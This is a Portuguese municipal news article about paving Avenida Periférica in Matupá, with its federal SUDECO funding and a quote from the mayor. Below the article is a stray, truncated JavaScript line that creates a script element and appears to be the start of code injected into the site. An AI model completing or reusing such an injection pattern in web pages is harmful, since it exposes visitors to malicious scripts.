Capa / Cidades / Matupá em Obras: Pavimentação da Avenida Periférica

Matupá em Obras: Pavimentação da Avenida Periférica

Estão sendo investidos mais de R$ 1.099.967,70.

Notícia Vipasfalto3

Depois de desenvolver os serviços de drenagem, galeria de águas pluviais e preparação de serviços de base, sub-base e reforço do subleito através de compactação, a Prefeitura Municipal de Matupá está fazendo a aplicação de camada impermeável, piche e posteriormente a massa asfáltica na Avenida Periférica que ligará a Avenida Sebastião Alves Júnior a Avenida Hermínio Ometto.

Estão sendo investidos mais de R$ 1.099.967,70. Os recursos foram captados pelo Gestor Matupaense, junto a Superintendência de Desenvolvimento do Centro Oeste (SUDECO) — Órgão Federal ligado ao Ministério da Integração Nacional.

“Estamos acompanhando a execução das obras prezando sempre pela sua excelência de qualidade. É nossa missão como gestor público aplicar corretamente os recursos e promover a infraestrutura necessária para melhorar o trânsito de veículos, diminuir a poeira na estiagem e a lama no período de chuvas, mas principalmente em assegurar a qualidade de vida de nossos cidadãos, agregação de valor aos seus imóveis e embelezamento do município como um todo, tornando-o cada vez mais atrativo olhos dos futuros investidores e moradores”, enfatizou Prefeito.

Com a chegada do período de seca deverão ser desenvolvidos os trabalhos relacionados a confecção do meio fio nesta importante via que liga também o complexo dos lagos a Secretaria Municipal de Agricultura, Centro Educacional Integrado e o Fórum da Comarca de Matupá localizados no Bairro Regional.

 var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top